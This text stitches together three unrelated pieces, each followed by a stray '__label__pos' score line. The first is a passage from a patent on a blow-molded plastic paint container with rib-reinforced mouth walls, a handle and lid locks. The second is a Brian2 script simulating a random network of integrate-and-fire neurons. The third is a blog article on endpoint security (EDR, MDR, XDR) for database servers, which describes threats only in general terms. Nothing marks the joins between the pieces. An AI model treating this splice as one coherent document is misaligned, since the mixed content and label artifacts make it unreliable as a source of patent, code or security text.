lid, thereby preventing the lid from popping-out caused by a reaction in opening. 7. An injection stretch blow molded wide mouthed container for a paint container and the like according to claim 1, comprising a configuration in which: a rim of a lid of synthetic resins is formed largely in diameter to extend over a mouth end edge of the external wall and is shaped into a fitting groove so that the lid can be fitted both to the inner surface of the internal wall and to the mouth end edge of the external wall; an engaging edge is formed on the outside of the mouth end edge of the external wall; and a secondary fit provided between the engaging edge and an annular groove formed in the inside of said fitting groove prevents the lid from self-opening resulting from a looseness of the fitting with the inner surface of the mouth portion caused by the internal pressure of the container. 8. An injection stretch blow molded wide mouthed container for a paint container and the like according to claim 7, comprising an air vent provided in said external wall for discharging the gas leaked out on account of the loosened fit of said lid with the inner surface of the mouth portion so as to reduce the content of the paint container so that the sealing resulting from the fit with the inner surface of the mouth portion is restored. Description TECHNICAL FIELD The present invention relates to a wide mouthed container of synthetic resins for paint, wax and the like, formed thinly in the body portion thereof by injection stretch blow molding. BACKGROUND ART In a wide mouthed container for paint, wax and the like, a mouth portion thereof comprises an external wall and an internal wall that is formed to be lower than and on the inside of the external wall past an annular groove. A lid is fitted to an inner side surface of the mouth portion formed by the internal wall, and a rim of the lid is fitted to the inside of the external wall, so that the container is kept sealed. The lid can be easily removed by inserting a tip of a screwdriver and the like between the external wall and the rim of the lid, and pushing down a grip of the screwdriver supported at the external wall. Conventionally, most of such wide mouthed containers with a double-walled mouth portion are made of metal, but those of synthetic resins are newly manufactured by employing the injection molding method, injection blow molding method and the like. However, such molded articles cannot be thinly formed in the body portion thereof, and are poor in strength as compared with those of metals, which gives rise to a problem in that they are easily broken when dropped. Approaches to the problem are made in which paint containers and the like are manufactured by employing the injection stretch blow molding method that enables resins to be reinforced by biaxial stretching. A paint container disclosed in WO97/19801 is manufactured by the steps of: injection molding a preform consisting of a large-diameter mouth portion comprising a belt shaped external wall and an internal wall which is formed to be lower than and on the inside of the external wall via a joint portion past an annular groove, and a body portion having a bottom which is molded extending from the underside of the internal wall; transferring the preform to a blow mold for molding a paint container; and stretch blowing the preform below the body portion thereof from the underside of the internal wall. In the disclosed injection stretch blow molding, the external and internal walls of the mouth portion cooled and solidified are held between a mouth forming mold and a core mold while heated portions below the body portion thereof is axially stretched. At almost the same time, the body portion is also air blown to a skirt portion which is projectingly formed on the underside of the external wall, so that the unstretched joint portion and an upside of the body portion which is blown and stretched into shoulder-shape are integrated. In a paint container according to the ways described above, the body portion and bottom thereof are thin and biaxially oriented by the stretch blowing. Therefore, as compared to those manufactured by injection molding or injection blow molding, such a container is light in weight and improved in falling strength, and may be improved in gas barrier capability depending on the material resins. However, in the stretch blowing according to the aforesaid prior art, no supporting part for the aforesaid joint portion is provided between the skirt portion and the internal wall; therefore, axial tensile stresses concentrate to the joint portion in stretch blowing, the joint portion is drawn downwardly from a corner of the skirt portion and deformed, and strains occur in the internal wall. This gives rise to a problem in that the molding accuracy is decreased in a mouth end edge and an inner surface of the internal wall which are to be a fitting edge and an inner side surface of the mouth portion, and thus the fit with the lid is deteriorated and the sealing capability lost. As the span of the joint portion gets longer, the strains in the internal wall caused by the axial stretching come to the front. This can be improved by reducing the span, which, however, limits the radial expansion of the body portion. Thereby the body portion is formed thicker in the upper part thereof and thinner in the lower, resulting in unevenness of the wall thickness, which lowers the buckling strength of the body portion. In such cases, containers at the bottom may be deformed by load when a plurality of containers are piled up. Like an injection blow molded paint container disclosed in the Japanese Patent Laid-Open Publication No. Sho 57-77439, ribs may be provided to support the joint portion. However, such ribs as described therein being formed across the external and internal walls cause a difference between ribbed and non-ribbed portions in stretched state. As a result, irregularity tends to be induced on the inner surface of the internal wall to which a lid is fitted. Since touching to and located between the external and internal walls, the ribs take time to be cooled and solidified completely enough for bearing the tensile stress. On the other hand, the preform has to be released from the molds while the portions below the body portion still have a required amount of heat for stretch blowing. Therefore, the support by providing the ribs has not always been an effective approach for injection stretch blow molding. Through the perpetual studies of the inventor of the present invention concerning the prevention of the aforesaid tensile deformation of the internal wall caused by the axial stretch, it has been found that even though ribs are employed for supporting the joint portion, conventional defects can be avoided depending on the way of forming ribs. That is, even in a wide mouthed container such as an injection stretch blow molded paint container, the inventor has found that it is possible to prevent the tensile deformation of the joint portion resulting from the stretching, as well as to avoid the convexo-concave deformation of the inner surface of the mouth portion caused by the conventional ribs and to finish the cooling and solidification of the ribs in a short period of time. It is thus an object of the present invention to provide an injection stretch blow molded wide mouthed container of large diameter for a paint container and the like in which the problem of the strains in the internal wall resulting from the tensile deformation of the aforesaid joint portion is solved by the introduction of the reinforcing means using small ribs, and, despite of being made of synthetic resins, the body portion is formed thinly and is improved in falling strength because of the biaxial orientation. In addition, the present invention is to provide an injection stretch blow molded wide mouthed container of large diameter for a paint container and the like in which the body portion and the external wall of the mouth portion are formed into side faces on the same level, like conventional paint tins and the like. By this means, even if the radial expansion of the body portion is limited, the employing of a preform of certain shape in cross-section allows the body portion to be molded without irregular in wall thickness, thereby enabling a plurality of the wide mouthed containers to be piled up. Furthermore, the present invention is to provide an injection stretch blow molded wide mouthed container of large diameter for a paint container and the like in which a handle can be rotatably mounted across both sides of the mouth portion by utilizing the external wall, and the lid can be prevented from popping-out caused by a reaction in removing the lid, an increase in pressure inside the container, or the like. DISCLOSURE OF THE INVENTION The present invention according to the aforesaid objects is to provide a wide mouthed container, in which: a mouth portion of large diameter is composed of an internal wall integral with a body portion having a bottom, a belt shaped external wall integrally formed on the outside of the internal wall via a joint portion of required width to be in H-shape, and an upper and lower annular grooves between both the walls sectioned by the aforesaid joint portion; and the aforesaid body portion is stretch blow molded thinly from the underside of the internal wall to a position where the lower edge of the external wall touches the body portion to form the side surface of the body portion on the same level as the aforesaid external wall and to form the lower annular groove into a hollow in the lower part of the mouth portion, the wide mouthed container comprising a rib for preventing the deformation of the joint portion in stretching the body portion, integrally formed aslope onto a corner between the under surface of the aforesaid joint portion at its external wall side and the inner surface of the external wall, a required number of the ribs provided in the lower annular groove at a regular interval. In such a configuration, even if axial tensile forces acting on the internal wall concentrate to the joint portion in stretch blowing, the joint portion holds so as to prevent the internal wall from being distorted downwardly by the tensile forces since the joint portion is supported by the aforesaid ribs at a regular interval. Therefore, the end edge of the internal wall suffers from no deformation, and keeps the same horizontal accuracy as in the injection molding. The ribs are located on the external wall side apart from the internal wall, which solves the problem that the existence of a rib causes a difference in stretched state of the internal wall and an irregularity occurs on the side surface of the internal wall to which a lid is fitted. In addition, the ribs are rapidly cooled and solidified along with the external wall, so that the mouth portion with the ribs will not take a long time to be cooled. In addition, the present invention is provided in which the container is molded in such a manner that an injection molded preform comprising a mouth portion of large diameter composed of an internal wall integral with a body portion having a bottom, a belt shaped external wall integrally formed on the outside of the internal wall via a joint portion having a required width to be in H-shape, and an upper and lower annular grooves between both the walls sectioned by the aforesaid joint portion, is held at the aforesaid mouth portion provided by cooling and solidifying, and the aforesaid body portion is stretch blown to the same level as the aforesaid external wall while a portion from the underside of the aforesaid internal wall to the body portion is in high temperatures. The aforesaid preform comprises the body portion extending from the aforesaid internal wall in which the body portion is composed of a thick-walled planiform stretch expanded portion of corn shape and a recess of required diameter formed at the center of the aforesaid preform by outwardly projecting a top portion of the stretch expanded portion, the bottom surface of the recess is formed to be nearly flat and thin, and the stretch expanded portion on the periphery of the recess is formed to curve inwardly. In the preform, a top portion of a stretch rod is set into the aforesaid recess and expanded to press the bottom, so that the stretch expanded portion in heated state is stretched from a hem of the internal wall to be thinned. Therefore, a wide mouthed container with generally uniform thickness in the body portion can be obtained although the radial expansion of the body portion is limited to the position of the external wall. The present invention is also provided in which mounting holes are formed at symmetrical positions on the external wall in the molding of the aforesaid preform, and fitting tabs projectingly provided on the inner sides of both end portions of a flexible corded handle are rotatably fitted and locked into the mounting holes respectively to mount the aforesaid handle across both sides of an opening portion. Here, the aforesaid fitting tabs are of tablet shape and comprise a semicircular locking block on the upside of the tip thereof, and the end portions of the handle and the fitting tabs comprise a slit extending from the lower end to the central portion thereof. The slits allow the end portions of the handle and the fitting tabs to be reduced in size to insert the fitting tabs along with the locking blocks into the aforesaid mounting holes rotatably, so that the aforesaid locking blocks are hooked and set inside the external wall. Moreover, the present invention is provided in which a projection for latching is projectingly provided on a rim of a lid and is inserted into a fitting hole provided in a side surface of the external wall to close the lid, thereby preventing the lid from popping-out caused by a reaction in opening. Furthermore, the present invention is provided in which a rim of a lid of synthetic resins is formed largely in diameter to extend over a mouth end edge of the external wall and is shaped into a fitting groove so that the lid can be fitted both to the inner surface of the internal wall and to the mouth end edge of the external wall, an engaging edge is formed on the outside of the mouth end edge of the external wall, and a secondary fitting provided between the engaging edge and an annular groove formed in the inside of the aforesaid fitting groove prevents the lid from self-opening resulting from a looseness of the fitting with the inner surface of the mouth portion caused by the internal pressure of the paint container. Here, an air vent is also provided in the aforesaid external wall for discharging gas leaked out on account of the loosened fit of the aforesaid lid with the inner surface of the mouth portion so as to reduce the inside volume of the paint container, so that the sealing resulting from the fit with the inner surface of the mouth portion is restored. BRIEF EXPLANATION OF THE DRAWINGS FIG. 1 is a longitudinal sectional view of a stretch blow molded wide mouthed container according to the present invention. FIG. 2 is an enlarged sectional view of an essential portion of a stretch blow molded wide mouthed container according to the present invention. FIG. 3 is a longitudinal sectional view of a preform of a stretch blow molded wide mouthed container according to the present invention. FIG. 4 is a bottom plan view of the preform. FIG. 5 is a sectional view of a preform of a stretch blow molded wide mouthed container according to the present invention in molding a paint container, where dashed lines show the preform under the stretch blowing. FIG. 6 is an enlarged partially sectional view of a mouth portion of a stretch blow molded wide mouthed container according to the present invention. FIG. 7 is a front view of a paint container with a handle according to the present invention, where dashed lines show the piled state thereof. FIG. 8 is a side view of a paint container with a handle according to the present invention. FIG. 9 is a partially cutaway plan view of a paint container with a handle according to the present invention; FIG. 10 is a partially longitudinal sectional view of a mouth portion showing the mounting state of a handle and the fitting state of a lid at its rim according to the present invention. FIG. 11 is a partially longitudinal sectional view of a mouth portion with a lid having fitting means to a mouth end edge of an external wall. BEST MODE FOR CARRYING OUT THE INVENTION A wide mouthed container shown in FIG. 1 is a paint container molded of polyethylene terephthalate (PET). A large-diameter mouth portion 1 comprises an internal wall 3 integral with a body portion 2 having a bottom, a belt shaped external wall 4 integrally formed on the outside of the internal wall 3 via a joint portion 5 of required width to be in H-shape, and an upper and a lower annular grooves 7 and 8 between both the walls 3 and 4 sectioned by the joint portion 5. The external wall 4 is formed taller than the internal wall 3. A projection 6 is integrally molded on the outside of an end edge of the external wall 4. The aforesaid body portion 2 is stretch blow molded thinly (about 0.5 mm) and vertically from the underside of the internal wall 3 to a portion where the side surface of the body portion 2 reaches to and becomes at the same level as the external wall 4. By this means, the lower annular groove 8 is formed into a hollow in the underside of the mouth portion 1, a pedestal 11 of a diameter smaller to some extent than the internal wall 4 is projectingly molded on a bottom portion 10 extending from the body portion 2, and thus the wide mouthed paint container is formed. Designated by 9, 9 are ribs for supporting the joint portion 5, eight of which are provided in the aforesaid lower annular groove 8 at a regular interval in this embodiment. The ribs 9 are integrally formed aslope on corners between the under surface of the joint portion 5 on the external wall side and the inner surface of the external wall 4, apart from the internal wall 3, so as to prevent the deformation of the joint portion 5 in stretching the body portion. In a paint container of such configuration, as shown in FIG. 2, a lid 30 is fitted into the inside of the internal wall 3 like well-known paint tins, and a rim 30 a of the lid 30 is received by a mouth end edge 3 a of the internal wall 3, so that the lid 30 is set inside the external wall 4. FIG. 3 shows a preform 12 of the aforesaid paint container. The mouth portion 1 of the paint container is injection molded in advance as a mouth portion 13 of the preform 12 of the same structure along with a bottomed body portion of the preform 12 extending from the internal wall 3. The body portion of the preform is composed of a thick-walled planiform stretch expanded portion 14 of corn shape, and a recess 16 of required inner diameter formed at the center of the preform by projecting a top portion 15 of the stretch expanded portion outwardly. The recess 16 is formed to be thin and nearly flat at its bottom surface 17, and to curve inwardly at its stretch expanded portion 14 a (see FIGS. 4 and 5) on the periphery of the recess 16. The preform 12 is released from an injection mold while portions from the underside of the internal wall 3 to the stretch expanded portion 14 are still in heated state. Up to this time, the mouth portion 13 of the preform is cooled and solidified. Accordingly, as shown in FIG. 5, with the mouth portion 13 held at its outside with a mouth forming mold 18 used in the injection molding, the preform is transferred to a blow mold 19 before a blow core 20 is fitted to the internal wall 4. Here, with the previously solidified mouth portion 13 of the preform held between the blow core 20 and the mouth forming mold 18, the preform is stretch blow molded into a wide mouthed container. The stretch blow molding is performed in such a manner that: a top portion 22 of a stretch rod 21 equipped in the blow core 20 is set into the recess 16; the center portion of the preform is pressed downwardly with the stretch rod 21 so as to extend the body portion of the preform axially from the underside of the internal wall 3; and, almost at the same time, the stretch expanded portion 14 is expanded radially by air blowing. In the preform 12, an upper part of the stretch expanded portion 14 is stretched to be slightly thinner by the expansion of the aforesaid stretch rod 21. The thinning of the wall lowers the temperature of the part, so that the stretch is shifted to an unstretched portion below. After this manner, the expanded portion 14 a on the periphery of the recess 16 curving inward is stretched, and the body portion of the preform is changing into an elongated truncated corn shape. Here, the distance of the body portion of the preform from a cavity surface of the blow mold 19 increases as approaching to the bottom, which makes a difference in radial stretch ratio at the upper and lower parts. However, the difference is cancelled to some extent by the wall thickness, so that the body portion 2 of the paint container is prevented from the unevenness in wall thickness. Accordingly, even in a paint container that tends to be limited in radial stretch expansion more tightly and formed thicker in upper parts, the body portion 2 expanded and formed thinly from the internal wall 3 to a portion where to meet with he under edge of the external wall 4 is evened in wall thickness distribution and improved in buckling strength. The stretch blow molding may be favorably performed before the surface temperature of the stretch expanded portion 14 in heated state reaches its peak temperature by the internal heat. Moreover, in the axial stretch by the stretch rod 21, the mouth portion 13 of the preform is previously solidified and is held between the mouth forming mold 18 and the blow core 20. On the other hand, the internal wall 3 is held only at one side against the blow core 20, merely by flat contact, differing from the external wall 4 which is held by the fitting of a projecting edge 6. Therefore, the downward tensile force causes a slip in the internal wall 3, resulting in the concentration of stresses to the aforesaid joint portion 5. However, the tensile stresses are partially dispersed to the external wall 4 via the aforesaid ribs 9, 9 formed on the corners between the joint portion 5 and the external wall 4. The ribs 9, 9 also enable the joint portion 5 to resist against the tensile force. As a result, the strain in the internal wall 3 caused by the joint portion 5 is deterred, the inner surface of the mouth portion formed of the internal wall 3 and the mouth end edge 3 a of the stretch blow molded paint container are prevented from deformation, and the shape and the horizontal accuracy thereof are kept assured as in the previous injection molding. Furthermore, being provided in the lower annular groove 8, the ribs 9, 9 for preventing the deformation differ from well-known ribs formed across the internal and external walls 3 and 4 in that they are easily cooled along with the external wall 4 because of being isolated from the internal wall 3. In addition, the ribs cause no irregular deformation of the inner surface since they are not in touch with the internal wall 3. Moreover, the lower annular groove 8 of the joint portion 5 is left closed with the blow molded body portion 2 to form a hollow after the molding. However, the aforesaid ribs 9, 9 in the hollow reinforce the external wall 4 against external force, so that the strain in the external wall 4 by external force is deterred, and the mouth portion 1 is also prevented from the deformation by external force. Accordingly, even though the wide mouthed container is of stretch blow molded synthetic resins, no disorder occurs in molding accuracy of the injection molded mouth portion, so that a lid is freely fitted and a poor sealing hardly occurs. In addition, the biaxial orientation of the body portion improves impact strength and gas barrier property, thereby enhancing its application for a wide mouthed container for a paint and the like in which color of content is distinguishable from the outside. Furthermore, wide mouthed containers of the same configuration can be manufactured from various synthetic resins as long as the resins are available for stretch blow molding, and thus be widely applied to wide mouthed containers for volatile content. FIGS. 7 to 10 show a case where a handle 23 is mounted to a paint container by utilizing the aforesaid external wall 4. In molding the aforesaid preform 12, mounting holes 24, 24 are formed at symmetrical positions on the external wall 4 by using projecting portions (not shown) provided in the mouth forming mold 18 of split molds. Fitting tabs 25, 25 projectingly provided on the inner sides of both end portions of the corded handle 23 of flexible synthetic resins (polypropylene, for example) are rotatably fitted and locked into the mounting holes 24, 24, respectively. The aforesaid fitting tabs 25, 25 are of tablet shape and have a semicircular locking block 26 on the upside of the tips thereof, respectively. The end portions of the handle and the fitting tabs 25 have a slit 27 extending from their lower end to the center. The slits 27 enable the fitting tabs 25 along with the end portions of the handle to be pressed and reduced in size so that the locking blocks 26 can be upwardly slantly inserted into the mounting holes 24. In this manner, the locking blocks 26 are set in the aforesaid lower annular groove 8 forming a hollow, and are retained inside the external wall 4. Note that provided concavely in the peripheral surface of the external wall 4 is a retention groove 28 for use in the stretch blowing. The. bottom of the paint container may be formed into a step portion 2 a in the periphery thereof, as shown in FIG. 7, in stead of the aforesaid pedestal 11. Here, the step portion 2 a is provided with an outer diameter smaller to some extent than the inner diameter of the external wall 4 so as to be set inside the external wall 4, and a bottom periphery 2 b is provided with a proper height so as to ride on the mouth end edge of the external wall 4. By this means, when a plurality of the paint containers are piled up as shown in FIG. 7, respective loads thereof hold down the lids 30 of the paint containers below. Furthermore, even if the loads cause the distortion in the body portions, the external walls 4 can provide a support against falling down. In FIG. 10, a projection 30 b for locking is projectingly provided on a rim 30 a of the aforesaid lid 30 of synthetic resins, and a fitting hole 29 for fitting the projection 30 b is provided in the side surface of the external wall 4. The lid 30 is closed with the projection 30 b inserted into the fitting hole 29, and is opened by being unclenched at the opposite side to the projection 30 b. This prevents the lid 30 from popping-out caused by a reaction in opening. In such a configuration, the external wall 4 is molded higher than the internal wall 3 by the width of the fitting hole 29, and the lid cannot be opened with a screwdriver and the like by using the mouth end edge of the external wall 4 as the fulcrum. Therefore, a notch 31 for lid opening is formed in the edge opposite the fitting hole 29, as shown in FIG. 9. The notch 31 is not limited to the aforementioned position, and a plurality thereof may be provided. In FIG. 11, the lid 30 of synthetic resins is provided in which the rim 30 a thereof is formed largely in diameter to extend over a mouth end edge of the external wall 4 and is shaped into a fitting groove 30 c so that the lid can be fitted both to the inner surface of the internal wall 3 and to the mouth end edge of the external wall 4. An engaging edge 32 is formed on the outside of the mouth end edge of the external wall 4. In a case where an evaporated solvent resulting from hot air and the like causes a rise in the internal pressure of the paint container and loosens the fit of the lid to the inner surface of the mouth portion, the lid 30 may open by itself. However, a fit between the rim 30 a and the mouth end edge of the external wall 4 utilizing a secondary fit provided between the aforesaid engaging edge 32 and an annular groove 30 d formed in the inside of said fitting groove 30 c prevents the lid 30 from opening and popping-out. In addition, an air vent 33 is provided in the external wall 4 so that, when an increase in the internal pressure loosens the fit with the inner surface of the mouth portion and causes the evaporated gas to leak out, the air vent 33 discharges the gas and reduces the internal pressure to restore the seal resulting from the fit with the inner surface of the mouth portion. INDUSTRIAL APPLICABILITY As described above, in an injection stretch blow molded wide mouthed container of large diameter for a paint container and the like according to the present invention, a solution to the strains and the like in the internal wall resulting from the tensile deformation of the aforesaid joint portion is provided by the introduction of the reinforcing means using small ribs. In addition, the body portion is formed thinly and is improved in falling strength because of the biaxial orientation. Moreover, in the wide mouthed container according to the present invention, the employing of a preform of certain shape in cross-section enables the body portion to be molded without irregular in wall thickness, and thereby enabling a plurality of the wide mouthed containers to be piled up. Furthermore, in the wide mouthed container according to the present invention, a handle can be rotatably mounted across both sides of the mouth portion by utilizing the external wall. Besides, the lid can be prevented from popping-out caused by a reaction in removing the lid, an increase in pressure inside the container or the like. Patent Citations Cited PatentFiling datePublication dateApplicantTitle US3529743 *Aug 21, 1968Sep 22, 1970Ciba LtdContainer of thermoplastic synthetic material US4799602 *Mar 30, 1988Jan 24, 1989Metal Box P.L.C.Plug lid for a container US5176284 *Nov 8, 1990Jan 5, 1993PrimtecReduction of flexure in a plastic container having a thin flexible side wall US5180076 *Mar 1, 1991Jan 19, 1993Progressive Technologies, Inc.Waste container US5964372 *Jul 9, 1998Oct 12, 1999Georg Utz Holding AgPlastic container US6098833 *Jun 29, 1998Aug 8, 2000Von Holdt, Sr. John W.Plastic bucket and lid JP47096602A Title not available JPH05301500A Title not available JPS562133A Title not available JPS5851974A Title not available JPS6052410A Title not available JPS6078777A Title not available Referenced by Citing PatentFiling datePublication dateApplicantTitle US7165306Oct 15, 2003Jan 23, 2007Frito-Lay North America, Inc.Overcap having improved fit US7467730Jul 9, 2004Dec 23, 2008Masterchem Industries, LlcPaint container handle US20050006398 *Jul 9, 2004Jan 13, 2005Masterchem Industries, LlcPaint container handle US20050082304 *Oct 15, 2003Apr 21, 2005Bezek Edward A.Overcap having improved fit US20060226158 *Feb 12, 2004Oct 12, 2006Britton Charles JContainer, method and apparatus for making the same US20060237463 *Apr 21, 2006Oct 26, 2006Tony RiviezzoComponent seal for plastic tanks US20070080164 *Dec 12, 2006Apr 12, 2007Bezek Edward AOvercap Having Improved Fit USD472145Aug 14, 2001Mar 25, 2003Nottingham-Spirk Partners, LlcPaint container lid USD473790Aug 14, 2001Apr 29, 2003Nottingham-Spirk Partners, LlcPaint container insert USD480973May 31, 2002Oct 21, 2003Nsi Innovation LlpDesign for a round paint container USD482973Aug 14, 2001Dec 2, 2003Nsi Innovation LlcSquare paint container WO2004071745A1Feb 12, 2004Aug 26, 2004Gaydog LtdContainer, method and apparatus for making the same Legal Events DateCodeEventDescription Aug 3, 1999ASAssignment Owner name: A.K. TECHNICAL LABORATORY, INC, JAPAN Free format text: ASSIGNMENT OF ASSIGNORS INTEREST;ASSIGNOR:KODA, HIDEAKI;REEL/FRAME:010296/0102 Effective date: 19990727 Dec 25, 2001CCCertificate of correction Jul 21, 2004FPAYFee payment Year of fee payment: 4 Aug 11, 2008REMIMaintenance fee reminder mailed Jan 30, 2009LAPSLapse for failure to pay maintenance fees Mar 24, 2009FPExpired due to failure to pay maintenance fee Effective date: 20090130
__label__pos
0.590445
Example: CUBA This is a Brian script implementing a benchmark described in the following review paper: Simulation of networks of spiking neurons: A review of tools and strategies (2007). Brette, Rudolph, Carnevale, Hines, Beeman, Bower, Diesmann, Goodman, Harris, Zirpe, Natschlager, Pecevski, Ermentrout, Djurfeldt, Lansner, Rochel, Vibert, Alvarez, Muller, Davison, El Boustani and Destexhe. Journal of Computational Neuroscience 23(3):349-98 Benchmark 2: random network of integrate-and-fire neurons with exponential synaptic currents. Clock-driven implementation with exact subthreshold integration (but spike times are aligned to the grid). from brian2 import * taum = 20*ms taue = 5*ms taui = 10*ms Vt = -50*mV Vr = -60*mV El = -49*mV eqs = ''' dv/dt = (ge+gi-(v-El))/taum : volt (unless refractory) dge/dt = -ge/taue : volt (unless refractory) dgi/dt = -gi/taui : volt (unless refractory) ''' P = NeuronGroup(4000, eqs, threshold='v>Vt', reset='v = Vr', refractory=5*ms) P.v = 'Vr + rand() * (Vt - Vr)' P.ge = 0*mV P.gi = 0*mV we = (60*0.27/10)*mV # excitatory synaptic weight (voltage) wi = (-20*4.5/10)*mV # inhibitory synaptic weight Ce = Synapses(P, P, pre='ge += we') Ci = Synapses(P, P, pre='gi += wi') Ce.connect('i<3200', p=0.02) Ci.connect('i>=3200', p=0.02) s_mon = SpikeMonitor(P) run(1 * second) plot(s_mon.t/ms, s_mon.i, '.k') xlabel('Time (ms)') ylabel('Neuron index') show() ../_images/CUBA.1.png
__label__pos
0.907489
blog banner Understanding Endpoint Security for Databases This is a guest article by Gilad David Maayan from AgileSEO In almost every organization, the database is a mission-critical system that holds sensitive data. And that makes databases a prime target for attackers. While there are many ways to protect a database, from secure database configuration to secure coding practices at the application layer, an often overlooked aspect is endpoint security. Every organization must consider whether the physical host running the database server is secured -- and use the most advanced endpoint security technology to ensure that attackers cannot compromise it. What Is a Database? A database is an organized collection of information logically modeled and stored on easily accessible hardware, like a computer. A computer database can store data records or files containing information, such as customer data, financial information, and sales transactions. Aggregating this information together in a database enables you to observe and analyze it. Usually, a database requires a database management system, a computer program that enables database users to access, manipulate, and interact with the database. There are various database management systems, each suitable for different database types. Common types of databases include NoSQL, object-oriented databases, and relational databases. Types of Databases Relational Database A relational database stores structured data. It typically organizes data in tables. Each row represents a record within a table with a unique ID (a key), and a column represents data attributes. As a result of this schema, each record holds a value for each attribute, establishing relationships among various data points. Relational databases are ideal for information that requires high levels of integrity and less flexibility in terms of scalability. NoSQL Database A NoSQL database lets you store unstructured (non-relational) data. The lack of structure enables NoSQL databases to quickly process large amounts of data. It is also easier to expand and scale NoSQL databases. You can find many NoSQL databases hosted in various clouds. Object-oriented Database An object-oriented database is a relational database that represents data as an object—an item like a phone number or a name—or a class—a group of objects. Object-oriented databases are ideal for massive amounts of complex data that require quick processing. Cloud Database A cloud-based database stores data on a server in a remote data center, managed by a third-party cloud provider. The cloud provider might manage only the hardware and physical infrastructure (an IaaS model), or manage the database software itself (a PaaS model). Users can access and manage the database using the public Internet or a private network connection. Cloud databases are delivered by vendors via the shared responsibility model. The cloud vendor provides security features, like encryption to protect data at rest and in transit, but customers must secure their data and ensure secure configuration of the database system. Distributed Database A distributed database stores information in different physical sites. You can set it up so that the database is spread out across multiple locations or resides on multiple CPUs at a single site. A distributed database establishes connections between its multiple components, ensuring end-users view the information as a single database. It is ideal for scenarios that require limiting the available information and less redundancy. What Is Database Security and Why Is It Important? Database security involves protecting and securing a database from unauthorized access and usage, malicious intrusion, data misuse, and various damage. Database security provides coverage for the database itself, the data it contains, the associated database management system, and all the applications that access the database. Data security employs various processes, methodologies, and tools to ensure the security of a database environment. It is an essential practice for organizations that employ several interrelated databases and database management systems that work with their applications. Database security can help prevent data breaches and reduce the scope of damage during disasters. Database Security Threats Database security threats put your information at risk. Common data security threats include data theft, privacy breaches, unauthorized access, fraud, availability disruption, and integrity issues. These threats can originate from malicious human actions, natural disasters, unintentional accidents, or random events. Here are common database security threats to watch out for. • SQL injection occurs when threat actors send unauthorized database queries that manipulate the server into revealing information. You can mitigate this threat by using prepared SQL statements. • Denial of Service (DoS) attacks occur when threat actors repeatedly request service until they slow it down or render it unavailable for legitimate users. You can mitigate this threat by monitoring and controlling inbound and outbound traffic. • Overly permissive privileges occur when users have more privileges than required to perform their responsibilities or gain access to restricted information. You can mitigate this issue by using query-level access control. • Privilege abuse occurs when users misuse their privileges to perform unauthorized actions. You can mitigate this threat by using access control policies. • Unauthorized privilege escalation occurs when threat actors escalate low-level access privileges to higher-level privileges. You can mitigate this by applying the “least privilege” principle. • Platform vulnerabilities occur when a platform or operating system is vulnerable to data leakage or corruption. You can mitigate this threat by using an efficient patch management and vulnerability assessment process. • Backup exposure occurs when a backup storage media is not protected against attacks. For example, ransomware attacks target data and may destroy any unprotected backup copies to ensure victims have no other choice but to pay the ransom. You can mitigate this threat by limiting access to backups and using secure devices. Endpoint Security for Databases While there are many security threats facing production databases, one of the most severe is the risk of attackers compromising the database server itself. By compromising the server, an attacker can not only steal data from the database, but also sabotage it, causing business disruption, or use the database server as a foothold to gain access to other critical systems. Endpoint protection solutions consist of software deployed on endpoints like computers and mobile devices, providing several layers of security that prevent attackers from compromising the endpoint. It is especially important to deploy endpoint security on a database server. Endpoint security solutions typically provide: • Advanced antimalware protection that is effective against fileless malware, ransomware, and other new types of malware that might not be blocked by legacy antivirus. • Behavioral analysis based on machine learning to detect zero-day threats. • Web filtering to ensure that users of a device do not visit unsafe websites. • Data classification and data loss prevention (DLP) to prevent data loss and exfiltration. • Integrated device firewall to protect against network attacks. • Access to forensics on the device to allow security teams to easily triage and respond to threats on the endpoint. • Insider threat protection to identify anomalous user behavior and prevent insiders from abusing their privileges. • Disk encryption to prevent attackers from stealing data on the device. When selecting an endpoint security solution for a database server, look for the following important capabilities. • Lightweight endpoint security agent—database server performance is critical to business operations, so it is important to select a solution with an agent that has minimal impact on device performance. • Operating system support—ensure that the solution supports your database server’s operating system, whether it is Windows, Mac, or specific Linux distributions. • Centralized monitoring and management—the solution should allow security teams to monitor database servers across the organization on one console, identify threats, and take immediate action. • Endpoint detection and response (EDR)—advanced endpoint security solutions include EDR, which helps security analysts identify breaches taking place on an endpoint, easily gain access to forensic information to investigate the incident, and rapidly respond. This is especially important for a database server, where every second counts in case of an attack. Types of Endpoint Security Solutions Here are popular endpoint security solutions for databases. Endpoint Detection and Response Tools Endpoint detection and response (EDR) tools can be deployed directly on a database server. They aggregate threat information from managed endpoints and analyze it, looking for abnormal behavior that may indicate a security breach. These tools can help security teams identify a breach happening on a database server and facilitate faster response time to reduce the impact of an attack. Managed Detection and Response Services Managed detection and response (MDR) services provide remote cybersecurity monitoring, detection, and response. Organizations without full-time security staff can employ MDR services to obtain the expertise and tooling needed for effective endpoint security coverage. Using MDR services for critical systems like database servers can dramatically improve the time to detect and respond to cyber attacks. Extended Detection and Response Platforms Extended detection and response (XDR) technology provide a centralized platform for threat detection and response across all endpoints and networks. XDR combines network monitoring with endpoint monitoring to provide clearer visibility into database attacks. This is important because most attacks do not start on the database server itself, and it is common for attackers to conduct reconnaissance or other activities elsewhere on the network, which can help identify an attack. XDR platforms automatically collect and correlate data across all security layers, effectively breaking down data silos that may hide malware and other threats to database systems. Conclusion In this article, I explained the basics of database security and introduced three types of security solutions that can dramatically improve security for database servers: • EDR—software deployed on the database server itself that can detect breaches and help security analysts rapidly respond. • MDR—managed services that can enlist the help of outsourced security experts to secure database servers and other critical systems. • XDR—a security platform that can combine data from endpoints with security events on networks, email, cloud platforms, and other parts of the IT environment to detect evasive and sophisticated attacks. I hope this will be useful as you improve the security posture of your mission-critical database management systems. Gilad David Maayan from AgileSEO Gilad David Maayan is a technology writer who has worked with over 150 technology companies including SAP, Samsung NEXT, NetApp and Imperva, producing technical and thought leadership content that elucidates technical solutions for developers and IT leadership. Want to write an article for our blog? Read our requirements and guidelines to become a contributor. Comments Subscribe to our newsletter Stay tuned to the latest industry updates. By clicking subscribe you confirm, that you understand and agree to the Privacy Policy Latest Engineering Articles Join us on the TechTalks Discover new opportunities for your travel business, ask about the integration of certain technology, and of course - help others by sharing your experience. Visit TechTalks Write an article for our blog Almost 50 guest articles published from such contributors as Amadeus, DataQuest, MobileMonkey, and CloudFactory. Read how to become a contributor.
__label__pos
0.649529
